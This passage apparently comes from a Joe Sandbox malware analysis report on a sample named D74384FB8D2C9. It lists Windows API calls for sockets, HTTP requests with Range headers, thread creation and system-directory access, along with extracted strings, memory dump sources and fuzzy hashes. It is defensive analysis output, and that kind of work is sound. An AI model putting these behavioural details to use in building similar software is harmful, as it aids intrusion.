                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$Time__getptd$CleanupFileStartupSystem__aulldiv__time64_randgethostbyname
                                                                                  • String ID: P
                                                                                  • API String ID: 266322686-3110715001
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0040B668
                                                                                    • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
                                                                                    • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
                                                                                  • _memset.LIBCMT ref: 0040B684
                                                                                  • _memset.LIBCMT ref: 0040B6A1
                                                                                    • Part of subcall function 0040B300: WSAStartup.WS2_32(?,00000202,?), ref: 0040B358
                                                                                    • Part of subcall function 0040B300: __strlwr.LIBCMT ref: 0040B383
                                                                                  • _memset.LIBCMT ref: 0040B6CD
                                                                                  • _sprintf.LIBCMT ref: 0040B6EC
                                                                                  • _memset.LIBCMT ref: 0040B709
                                                                                  • _strlen.LIBCMT ref: 0040B718
                                                                                  • _strlen.LIBCMT ref: 0040B73E
                                                                                  • _strlen.LIBCMT ref: 0040B7A0
                                                                                  • _strlen.LIBCMT ref: 0040B7E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strlen$AllocateHeapStartup__strlwr_malloc_sprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2943933030-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_memset$Startup__strlwr
                                                                                  • String ID: Baidunetdisk
                                                                                  • API String ID: 782317163-1556622174
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: c$f$g$i$n$o
                                                                                  • API String ID: 2102423945-2981107110
                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 6A6E4A65
                                                                                  • ioctlsocket.WS2_32 ref: 6A6E4A81
                                                                                  • htons.WS2_32(?), ref: 6A6E4AB1
                                                                                  • inet_addr.WS2_32(?), ref: 6A6E4AE5
                                                                                  • connect.WS2_32(?,?,00000010), ref: 6A6E4B00
                                                                                  • WSAGetLastError.WS2_32 ref: 6A6E4B11
                                                                                  • select.WS2_32(?,00000000,?,?,?), ref: 6A6E4B77
                                                                                  • __WSAFDIsSet.WS2_32(?,00000001), ref: 6A6E4B98
                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6A6E4BB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastconnecthtonsinet_addrioctlsocketselectsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1968875722-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00435674
                                                                                  • select.WS2_32(?,?,00000000,00000000,00000000,00000003), ref: 00435755
                                                                                  • recv.WS2_32(00000000,?,00000000,00000001,00000000), ref: 004357B5
                                                                                  • _strncmp.LIBCMT ref: 00435844
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strncmprecvselect
                                                                                  • String ID: @
                                                                                  • API String ID: 1671173849-2766056989
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00420842
                                                                                  • _memset.LIBCMT ref: 0042085F
                                                                                  • SendMessageA.USER32(00000000,000083F6,00000000,00000000), ref: 0042092E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$MessageSend
                                                                                  • String ID: $?-@$?-@
                                                                                  • API String ID: 2497471678-4072660992
                                                                                  Strings
                                                                                  • C:\pl.txt, xrefs: 6A6D21AB
                                                                                  • SetExeVerInfo : guaType: %d, bFree: %d, exeVerNum: %d, xrefs: 6A6D2197
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_sprintf
                                                                                  • String ID: C:\pl.txt$SetExeVerInfo : guaType: %d, bFree: %d, exeVerNum: %d
                                                                                  • API String ID: 970810673-3464333151
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000170,?,00000000), ref: 0041E553
                                                                                    • Part of subcall function 00415E70: _memset.LIBCMT ref: 00415EAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_memset
                                                                                  • String ID: $ $P$Z
                                                                                  • API String ID: 1827994538-915915091
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 00437A5E
                                                                                    • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
                                                                                    • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
                                                                                  • _memset.LIBCMT ref: 00437A83
                                                                                  • _rand.LIBCMT ref: 00437AA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_malloc_memset_rand
                                                                                  • String ID: <
                                                                                  • API String ID: 1602865748-4251816714
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DBAF0: _memset.LIBCMT ref: 6A6DBB23
                                                                                    • Part of subcall function 6A6DBAF0: _memset.LIBCMT ref: 6A6DBB46
                                                                                  • _memset.LIBCMT ref: 6A6E1181
                                                                                  • _memset.LIBCMT ref: 6A6E1195
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E11F6
                                                                                  • _strncpy.LIBCMT ref: 6A6E1286
                                                                                  • _strncpy.LIBCMT ref: 6A6E12A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_strncpy$DirectoryWindows
                                                                                  • String ID: .sys
                                                                                  • API String ID: 4209668992-15676193
• Opcode ID: 1649ba87d543546dc257a3c62752341b5728a8f0c2a14ad8d79f5ef6108cb1d9
• Instruction ID: 9c317232622879445e4f6de2ff32ef24d29a370cf19e63b37f9bcb45271c27da
• Opcode Fuzzy Hash: 1649ba87d543546dc257a3c62752341b5728a8f0c2a14ad8d79f5ef6108cb1d9
• Instruction Fuzzy Hash: 7C51D17020C3859FC305DF7888686EBBBE6BBD9304F44896DE4CAC7211EB719949D792
Strings
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: socket
• String ID: P
• API String ID: 98920635-3110715001
• Opcode ID: 0aeba45f5bfc29ccab774574c1352923785260cb9f0baacc52e25d24f754a2d1
• Instruction ID: ba58f892b5188a90b876a42170d2208b43fcf0872a1e877e38941ec49fc22c1c
• Opcode Fuzzy Hash: 0aeba45f5bfc29ccab774574c1352923785260cb9f0baacc52e25d24f754a2d1
• Instruction Fuzzy Hash: 76516070D01219ABDB24EF55DD95BEEB3B4AF48308F0050DEE50967282EB389E88CF55
Strings
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: socket
• String ID: P
• API String ID: 98920635-3110715001
• Opcode ID: 94d6a08f3dfc4441600006c1e90349ba11aa45ec648fbfddb3f069c3d6ff6e36
• Instruction ID: 479eb7cc5ae85fa3d2f3798be4b3bfc3d6bd3fc69b8aff8827d85eac13f0edad
• Opcode Fuzzy Hash: 94d6a08f3dfc4441600006c1e90349ba11aa45ec648fbfddb3f069c3d6ff6e36
• Instruction Fuzzy Hash: 4A514D70901219ABDF24EF55DD95BEEB3B5AF48308F0050DED10967282EB789E888F55
APIs
• _memset.LIBCMT ref: 6A6E4C34
• _sprintf.LIBCMT ref: 6A6E4CB6
• select.WS2_32 ref: 6A6E4D07
• send.WS2_32(?,?,00000000,00000000), ref: 6A6E4D22
• WSAGetLastError.WS2_32(?,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 6A6E4D2C
Strings
• GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive, xrefs: 6A6E4CB0
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: ErrorLast_memset_sprintfselectsend
• String ID: GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive
• API String ID: 2026077180-3218760813
• Opcode ID: 208df761e485db15644ae50c435b140b15b4251a514077229820cecbe9ce2e46
• Instruction ID: 2acb3913ff2ff7c2fb5a2b2ff7aac79e86b926ed516011f7482839a53cb04438
• Opcode Fuzzy Hash: 208df761e485db15644ae50c435b140b15b4251a514077229820cecbe9ce2e46
• Instruction Fuzzy Hash: 7741AF71609605AFD720CF78CC88BABB7E5FB89708F01892CE54987285EB71F9058F51
APIs
• ___set_flsgetvalue.LIBCMT ref: 6A6FDD7C
• __calloc_crt.LIBCMT ref: 6A6FDD88
• __getptd.LIBCMT ref: 6A6FDD95
• CreateThread.KERNEL32(00000000,6A6DD720,6A6FDCD0,00000000,00000004,00000000), ref: 6A6FDDBB
• ResumeThread.KERNELBASE(00000000,?,?,6A6D1503,6A6DD720,00000000,00000000), ref: 6A6FDDCB
• GetLastError.KERNEL32(?,?,6A6D1503,6A6DD720,00000000,00000000), ref: 6A6FDDD6
• __dosmaperr.LIBCMT ref: 6A6FDDEE
  • Part of subcall function 6A701068: __getptd_noexit.LIBCMT ref: 6A701068
  • Part of subcall function 6A700D34: __decode_pointer.LIBCMT ref: 6A700D3F
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• String ID:
• API String ID: 1269668773-0
• Opcode ID: db9b9bd33cd52304390992635dbdd2a80597863c850f5dfa68bcfc9d5c9d348d
• Instruction ID: 11d30f1d138c2ce03e0077173d90e9f5fa32e035c7fdfea33c2a8f56b5990b54
• Opcode Fuzzy Hash: db9b9bd33cd52304390992635dbdd2a80597863c850f5dfa68bcfc9d5c9d348d
• Instruction Fuzzy Hash: 5D11E6B2502244FFDB105FB9DD8888E7BF6EF4233CB120A29F124931C1DF70A9029A60
APIs
• SetErrorMode.KERNELBASE(00000000,00000000,?,6A6EDFB1,?,00000000,6A71B745,00000000), ref: 6A6F4914
• SetErrorMode.KERNELBASE(00000000,?,6A6EDFB1,?,00000000,6A71B745,00000000), ref: 6A6F491C
  • Part of subcall function 6A6F30B8: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 6A6F30F0
  • Part of subcall function 6A6F30B8: SetLastError.KERNEL32(0000006F), ref: 6A6F3107
• GetModuleHandleA.KERNEL32(user32.dll,6A6EDFB1,?,00000000,6A71B745,00000000), ref: 6A6F496B
• GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6A6F497B
  • Part of subcall function 6A6F4780: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?,00000000), ref: 6A6F47BD
  • Part of subcall function 6A6F4780: PathFindExtensionA.SHLWAPI(?), ref: 6A6F47D7
  • Part of subcall function 6A6F4780: __strdup.LIBCMT ref: 6A6F481F
  • Part of subcall function 6A6F4780: __strdup.LIBCMT ref: 6A6F485E
  • Part of subcall function 6A6F4780: __strdup.LIBCMT ref: 6A6F48A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: ErrorModule__strdup$FileModeName$AddressExtensionFindHandleLastPathProc
• String ID: NotifyWinEvent$user32.dll
• API String ID: 621541537-597752486
• Opcode ID: 9d45ca5226fbf6339522abbd17fe3b88f48e4d3f0028800783cd3bb072794401
• Instruction ID: a61fa06f3660907b335d31ed0bed361307077f3ff00b488ee75862eb809601c7
• Opcode Fuzzy Hash: 9d45ca5226fbf6339522abbd17fe3b88f48e4d3f0028800783cd3bb072794401
• Instruction Fuzzy Hash: 06018470A142545FDB10EFA5C908A497BEE9F45310B06886AE968D7352EF70DD01CFA6
APIs
• ___set_flsgetvalue.LIBCMT ref: 6A6FDCD5
  • Part of subcall function 6A705695: TlsGetValue.KERNEL32(?,6A705821,?,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A70569E
  • Part of subcall function 6A705695: __decode_pointer.LIBCMT ref: 6A7056B0
  • Part of subcall function 6A705695: TlsSetValue.KERNEL32(00000000,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A7056BF
• ___fls_getvalue@4.LIBCMT ref: 6A6FDCE0
  • Part of subcall function 6A705675: TlsGetValue.KERNEL32(?,?,6A6FDCE5,00000000), ref: 6A705683
• ___fls_setvalue@8.LIBCMT ref: 6A6FDCF2
  • Part of subcall function 6A7056C9: __decode_pointer.LIBCMT ref: 6A7056DA
• GetLastError.KERNEL32(00000000,?,00000000), ref: 6A6FDCFB
• ExitThread.KERNEL32 ref: 6A6FDD02
• __freefls@4.LIBCMT ref: 6A6FDD1E
• __IsNonwritableInCurrentImage.LIBCMT ref: 6A6FDD31
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 4166825349-0
• Opcode ID: 64fe4a7125c26a15adf2077616b6c3a3cfb8bf9c40452a813b08c5a8296d2660
• Instruction ID: 64a1ff115a558abccd135503df791895dbd3f82a4edfe1a47416a053eb8decf5
• Opcode Fuzzy Hash: 64fe4a7125c26a15adf2077616b6c3a3cfb8bf9c40452a813b08c5a8296d2660
• Instruction Fuzzy Hash: AEF0A4B4400200DFCB04ABB1D65C91E3BEAAF4570CB16C564E4158B116DF38EC4BCA50
APIs
• _malloc.LIBCMT ref: 6A6E39D0
  • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
  • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
  • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
• _memset.LIBCMT ref: 6A6E39FC
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000001,?,?,?,?,?,?,?,?), ref: 6A6E3A0C
• WaitForSingleObject.KERNEL32(?,00007530,?,00000000,00000000,?,?,?,00000001), ref: 6A6E3AC2
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocCreateEventHeapObjectSingleWait_malloc_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2881288967-0
                                                                                  • Opcode ID: 7d9230bb53538c01d34883737d6e8b934548cfc775395a24c6726065b4667a22
                                                                                  • Instruction ID: 9e26d0699e6f12c4725226c3e483e5c1b0b419f8ce22f4c7f1d95788d5fb9fce
                                                                                  • Opcode Fuzzy Hash: 7d9230bb53538c01d34883737d6e8b934548cfc775395a24c6726065b4667a22
                                                                                  • Instruction Fuzzy Hash: 258112B12096019FE304CF68CC84B56B7E5FF85324F154A2CE49A8B2A1EF75E909CB94
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0046E338
                                                                                    • Part of subcall function 00472B4F: TlsGetValue.KERNEL32(?,0046E33D), ref: 00472B58
                                                                                    • Part of subcall function 00472B4F: TlsSetValue.KERNEL32(00000000,0046E33D), ref: 00472B79
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 0046E343
                                                                                    • Part of subcall function 00472B2F: TlsGetValue.KERNEL32(?,?,0046E348,00000000), ref: 00472B3D
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 0046E355
                                                                                    • Part of subcall function 0046E2A9: __IsNonwritableInCurrentImage.LIBCMT ref: 0046E2B8
                                                                                    • Part of subcall function 0046E2A9: CloseHandle.KERNEL32(?,?,0046E313), ref: 0046E2DC
                                                                                    • Part of subcall function 0046E2A9: __freeptd.LIBCMT ref: 0046E2E3
                                                                                    • Part of subcall function 0046E2A9: RtlExitUserThread.NTDLL(?,00000000,?,0046E313), ref: 0046E2EC
                                                                                    • Part of subcall function 0046E2A9: __getptd.LIBCMT ref: 0046E2FE
                                                                                    • Part of subcall function 0046E2A9: __XcptFilter.LIBCMT ref: 0046E31F
                                                                                  • __freefls@4.LIBCMT ref: 0046E381
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046E394
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$CurrentImageNonwritable$CloseExitFilterHandleThreadUserXcpt___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 1364369042-0
                                                                                  • Opcode ID: 92918dbf574e75e616b8db59506508d6b8e8eb69ecca1e6de51603b8f31601c9
                                                                                  • Instruction ID: 2c63338e877e6065032e99ba7fbf3a8c245c052ebece0141bccbaed7ef1ca712
                                                                                  • Opcode Fuzzy Hash: 92918dbf574e75e616b8db59506508d6b8e8eb69ecca1e6de51603b8f31601c9
                                                                                  • Instruction Fuzzy Hash: 5011C4785006419FC708AFB7C959C5A7BA99F45318720805FF5084B363EE3CD883DA5A
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0046FEB8
                                                                                    • Part of subcall function 00472B4F: TlsGetValue.KERNEL32(?,0046E33D), ref: 00472B58
                                                                                    • Part of subcall function 00472B4F: TlsSetValue.KERNEL32(00000000,0046E33D), ref: 00472B79
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 0046FEC3
                                                                                    • Part of subcall function 00472B2F: TlsGetValue.KERNEL32(?,?,0046E348,00000000), ref: 00472B3D
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 0046FED6
                                                                                  • __freefls@4.LIBCMT ref: 0046FF0C
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046FF1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$CurrentImageNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                  • String ID:
                                                                                  • API String ID: 1213517137-0
                                                                                  • Opcode ID: f34a5d0e2f64b1e3d81edd70738cfa1457455fc91348c138eff97b05447bf812
                                                                                  • Instruction ID: 23175a17f92c9035708e6941550d8c5ed6e489cbd063f5f9c2718df5f0a97e00
                                                                                  • Opcode Fuzzy Hash: f34a5d0e2f64b1e3d81edd70738cfa1457455fc91348c138eff97b05447bf812
                                                                                  • Instruction Fuzzy Hash: 490125241007816BC708BFB2D905C4E7F589F52314B24C06FE58847263EA7CD846C69E
                                                                                  APIs
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046E2B8
                                                                                    • Part of subcall function 004784B0: __FindPESection.LIBCMT ref: 0047850B
                                                                                  • CloseHandle.KERNEL32(?,?,0046E313), ref: 0046E2DC
                                                                                  • __freeptd.LIBCMT ref: 0046E2E3
                                                                                  • RtlExitUserThread.NTDLL(?,00000000,?,0046E313), ref: 0046E2EC
                                                                                  • __getptd.LIBCMT ref: 0046E2FE
                                                                                  • __XcptFilter.LIBCMT ref: 0046E31F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentExitFilterFindHandleImageNonwritableSectionThreadUserXcpt__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 3342091778-0
                                                                                  • Opcode ID: 8dcf91306e713a2fa630cc9f2cc412dd8a6fd8233650feebf2da47baf20a0a7d
                                                                                  • Instruction ID: 1116f9c278125002f1b6b7d1d883237877c00db81fccb563b58b5edf801ddee5
                                                                                  • Opcode Fuzzy Hash: 8dcf91306e713a2fa630cc9f2cc412dd8a6fd8233650feebf2da47baf20a0a7d
